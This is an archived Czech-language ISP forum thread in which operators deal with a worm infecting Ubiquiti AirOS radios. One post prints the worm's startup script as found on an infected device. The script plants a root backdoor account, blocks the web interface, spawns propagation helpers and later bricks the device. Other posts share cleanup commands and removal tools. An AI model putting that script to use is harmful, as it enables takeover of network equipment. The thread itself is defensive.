❗️Toto je původní verze internetového fóra ISPforum.cz do února 2020 bez možnosti registrace nových uživatelů. Aktivní verzi fóra naleznete na adrese https://telekomunikace.cz

Bezpečnostní chyba v AirOS

Návody a problémy s konfigurací.
Uživatelský avatar
info@adambalko.cz
Příspěvky: 94
Registrován: 14 years ago
Kontaktovat uživatele:

Re: Bezpečnostní chyba v AirOS

Příspěvekod info@adambalko.cz » 9 years ago

Sami si udělejte obrázek, co ten Motherfucker dělá ;)

Kód: Vybrat vše

XM.v5.5.10# cd /etc/persistent/
XM.v5.5.10# ls
cardlist.txt           dropbear_rsa_host_key  mf.tar
dropbear_dss_host_key  mcuser                 rc.poststart
XM.v5.5.10# ls -Al
drwxrwxr-x    2 1001     1001          320 May 14 10:44 .mf
lrwxrwxrwx    1 ubnt     admin          21 Jan  1  1970 cardlist.txt -> /usr/etc/cardlist.txt
-rw-------    1 ubnt     admin         457 May 28  2013 dropbear_dss_host_key
-rw-------    1 ubnt     admin         427 May 28  2013 dropbear_rsa_host_key
drwxr-xr-x    3 ubnt     admin          60 Jan  1  1970 mcuser
-rw-------    1 ubnt     admin       20480 May 14 10:44 mf.tar
-rwxr-xr-x    1 ubnt     admin          65 May 13 17:33 rc.poststart
XM.v5.5.10# cd .mf/
XM.v5.5.10# ls
curl                infect              mfid
download            libcrypto.so.0.9.8  mfid.pub
fuck                libcurl.so.4        mother
fucker              libssl.so.0.9.8     search
i                   mf.tar
XM.v5.5.10# cat mother
#!/bin/sh
per=/etc/persistent
grep "mother" /etc/passwd >/dev/null || echo 'mother:$1$J1CHZtqy$n0XDmW4UCVAVYZqFzvoEC/:0:0:Administrator:/etc/persistent:/bin/sh' >> /etc/passwd

iptables -I INPUT -p tcp --dport 80 -j DROP 2>/dev/null
iptables -I INPUT -p tcp -i lo --dport 443 -j DROP 2>/dev/null

cp $per/mf.tar $per/.mf/

(sleep 90 ; $per/.mf/download )&
(sleep 70 ; sleep 50 ; sleep 30 ; $per/.mf/search 2>/dev/null >/dev/null )&
(sleep 70 ; sleep 50 ; sleep 35 ; $per/.mf/search 7 15 2>/dev/null >/dev/null )&
(sleep 70 ; sleep 50 ; sleep 45 ; $per/.mf/search 0 64 2>/dev/null >/dev/null )&
(sleep 70 ; sleep 50 ; sleep 55 ; $per/.mf/search 25 16 2>/dev/null >/dev/null )&

(sleep 66666 ; $per/.mf/fucker 2>/dev/null >/dev/null )&
(sleep 666666 ;  sed -i 's/wireless.1.ssid=.*/wireless.1.ssid=motherfucker/' /tmp/system.cfg ;  sed -i 's/radio.1.mode=.*/radio.1.mode=Master/' /tmp/system.cfg; cfgmtd -f /tmp/system.cfg -w ; sleep 15 ; poweroff ) &

XM.v5.5.10#
0 x
internetkyjov.cz

rouchi
Příspěvky: 508
Registrován: 17 years ago
Kontaktovat uživatele:

Příspěvekod rouchi » 9 years ago

zkusil jsem jednu (docela evidentně napadenou anténu) upgradnout na 5.6.5. a po nezvylkle dlouhé době najela a tváří se ok zatím jenom po cca 5ti minutách se zase rebootla a od te doby už asi 10minut jede, tak sem zvědavej co to bude dělat a začínam se odhodlávat jít do hromadného upgradu... předpokládám, že 5.6.4 lze upgradovat až jako poslední....
0 x
UBNT mám rád, Mikrotik mám taky rád :-D považuji za zbytečné se přít co je lepší.
Jakub Havlíček

ludvik
Příspěvky: 4448
Registrován: 14 years ago

Příspěvekod ludvik » 9 years ago

My máme víc přístupových bodů. Nemluvě o tom, že co nejméně omezujeme přímou komunikaci. Izolace neřeší nic. Musela by být stoprocentní v rámci jak sítě, tak i přístupu z internetu (což ne každý má rád, když mu seknu port 80).
rado3105 píše:Zaujimavy je ten prenos od klientskeho napr. Airroutera alebo podobne do vasej siete. Tomuto by sa dalo predist izolaciou klientov na AP, pouzivate?
0 x
Jelikož je zde zakázáno se negativně vyjadřovat k provozním záležitostem, tak se holt musím vyjádřit takto: nové fórum tak jak je připravováno považuji za cestu do pekel. Nepřehledný maglajz z toho bude. Do podpisu se mi pozitiva již nevejdou.

Uživatelský avatar
info@adambalko.cz
Příspěvky: 94
Registrován: 14 years ago
Kontaktovat uživatele:

Příspěvekod info@adambalko.cz » 9 years ago

Pokud bude první napadené AP, tak je to pak fofr, páč se to číří přes discovery ;) Měl jsem napadeno přes sto jednotek včetně AP. Už je skoro vše OK. Ale víkend na ****. Jinak to jde docela dobře. Nedovedu si to představit v routované síti s několika tisíci kusy. To by musel být strašný vopruz :D

ludvik píše:My máme víc přístupových bodů. Nemluvě o tom, že co nejméně omezujeme přímou komunikaci. Izolace neřeší nic. Musela by být stoprocentní v rámci jak sítě, tak i přístupu z internetu (což ne každý má rád, když mu seknu port 80).
rado3105 píše:Zaujimavy je ten prenos od klientskeho napr. Airroutera alebo podobne do vasej siete. Tomuto by sa dalo predist izolaciou klientov na AP, pouzivate?
0 x
internetkyjov.cz

rado3105
Příspěvky: 2288
Registrován: 16 years ago

Příspěvekod rado3105 » 9 years ago

Siri sa to aj v routovanej sieti?
0 x

Peyrak
Příspěvky: 1588
Registrován: 18 years ago

Příspěvekod Peyrak » 9 years ago

jo, šíří
0 x

rouchi
Příspěvky: 508
Registrován: 17 years ago
Kontaktovat uživatele:

Příspěvekod rouchi » 9 years ago

no tak nové zjištění co mám že nejde přes discovery nahrát na nejnovější firmware a prakticky hromadně se toho zbavit... nejprve je nutné se připojit přes ssh provést scripty na odstranění a reboot a potom to lze.. :D tak to se asi poserem.. :D každopádně neznáte někdo způsob jak by šlo ty příkazy (cd /etc/persistent
rm -R mcuser
rm -R .mf
rm *
sed -n '/mother/!p' /etc/passwd > /etc/passwd.new
mv /etc/passwd.new /etc/passwd
cfgmtd -w -p /etc/
killall -9 search
killall -9 mother
killall -9 sleep
reboot
)
případně nějak hromadně poslat do všech zařízení v síti ?? díky za tipy...
0 x
UBNT mám rád, Mikrotik mám taky rád :-D považuji za zbytečné se přít co je lepší.
Jakub Havlíček

Peyrak
Příspěvky: 1588
Registrován: 18 years ago

Příspěvekod Peyrak » 9 years ago

je tu odkaz na androidí aplikaci, funguje spolehlivě, dokáže to vyčistit hromadně
0 x

hocimin1
Příspěvky: 1154
Registrován: 19 years ago
Bydliště: Náchod

Příspěvekod hocimin1 » 9 years ago

Ja jsem zatim neupgradoval.

Nahazel jsem všechna AP do firewallu a dropuju jim pristup na internet, a loguju to. Jakmile se mi objevi v logu, prihlasim se na NSM5 SSH a skriptem v /etc/persistent mazu

cd /etc/persistent
rm -R mcuser
rm -R .mf
rm *
sed -n '/mother/!p' /etc/passwd > /etc/passwd.new
mv /etc/passwd.new /etc/passwd
cfgmtd -w -p /etc/
killall -9 search
killall -9 mother
killall -9 sleep
reboot

(a vypinam Discovery). Je pravda, ze vsechny v logu byli napadnuty. Firmware mam ruzne 5.3.5, 5.5 atd

S upgradem na novy FW vyckavam, monitoruji zdali se to rozsiruje.
Naposledy upravil(a) hocimin1 dne 16 May 2016 20:31, celkem upraveno 1 x.
0 x

rado3105
Příspěvky: 2288
Registrován: 16 years ago

Příspěvekod rado3105 » 9 years ago

hocimin1 píše:Ja jsem zatim neupgradoval.

Nahazel jsem všechna AP do firewallu a dropuju jim pristup na internet, a loguju to. Jakmile se mi objevi v logu, prihlasim se na NSM5 SSH a skriptem v /etc/persistent mazu (vypinam Discovery). Je pravda, ze vsechny v logu byli napadnuty. Firmware mam ruzne 5.3.5, 5.5 atd

S upgradem na novy FW vyckavam, monitoruji zdali se to rozsiruje.


- celkom zaujimave reisenie, vies tu ten prikaz exportovat?

Co sa tyka toho skenera, je dostupny javovy balik aj pre win a linux:
https://community.ubnt.com/t5/airMAX-Ge ... 983#M55520

rozpisal som co bolo zaujimave v tej teme tu:
http://lokalnyisp.net/viewtopic.php?f=3 ... 9de5b9c9c0
0 x

Uživatelský avatar
info@adambalko.cz
Příspěvky: 94
Registrován: 14 years ago
Kontaktovat uživatele:

Příspěvekod info@adambalko.cz » 9 years ago

Pokud lze upgradovat na 5.6.5, tak jsem to udělal, pokud ne a zařízení běží, připojím se přes ssh a provedu pouze toto:

Kód: Vybrat vše

killall mother
killall sleep
killall search
killall infect
cd /etc/persistent
rm -f rc.poststart
rm -f mf.tar
rm -f .mf/*
rmdir .mf/


Poté lze do zařízení nahrát nový FW a vše je OK ;)
0 x
internetkyjov.cz

rado3105
Příspěvky: 2288
Registrován: 16 years ago

Příspěvekod rado3105 » 9 years ago

http://pastebin.com/raw/aNA1Usyn


vie niekto ako toto pouzit? mohlo by to ceyl proces kontroly zjednodusit....
0 x

Uživatelský avatar
info@adambalko.cz
Příspěvky: 94
Registrován: 14 years ago
Kontaktovat uživatele:

Příspěvekod info@adambalko.cz » 9 years ago

To vypadá dobře. Je to klasická smyčka s nastavitelným subnetem, která stáhne do zařízení skript s čističem a to by mohla být posloupnost těch čistících příkazů ;) Pak jen hromadně přes aircontrol poslat navý FW a bylo by vystaráno ;)

rado3105 píše:http://pastebin.com/raw/aNA1Usyn


vie niekto ako toto pouzit? mohlo by to ceyl proces kontroly zjednodusit....
0 x
internetkyjov.cz

rado3105
Příspěvky: 2288
Registrován: 16 years ago

Příspěvekod rado3105 » 9 years ago

vytvorim si cez text editor .script.sh
nano -w ./script.sh
tam vlozim to co je v tom pastebin
- zmenim port ssh podla seba...

potom to spustim:
sh ./script.sh heslo meno ipadresa

predtym treba nainstalovat to co tam pisu

- co je smola, ze to hned upgraduje na najnovsi firmware...keby to len vypisalo dobre a zle....nevie to niekto upravit?
0 x

Uživatelský avatar
UBNT-Vlad
Příspěvky: 55
Registrován: 9 years ago

Příspěvekod UBNT-Vlad » 9 years ago

Zdravim,

tak uz se objevily i modifikace hlavniho viru. Vse lze odstranit oficialni java utilitou odtud:

http://community.ubnt.com/t5/airMAX-Gen ... 869#M55108

Pripadne zde je odkaz na moji neoficialni appku pro Android:

https://github.com/vlada-dev/app-ubnt-v ... k?raw=true

Doporucuju update, protoze drivejsi verze appky neumela detekovat vsechny variace viru.

Aplikace je dostupna i na Google Play (https://play.google.com/store/apps/deta ... rusremoval), ale nemusi tam byt vzdy posledni verze (Googlu par hodin trva nez ji uverejni).

Nova verze umi odstranovat i Skynet, Pimpampum a i novou variaci toho soucasneho viru (Exploitim). Detekce je stejna jako u oficialni aplikace (Android appka by mela najit to same jako oficialni java aplikace).
0 x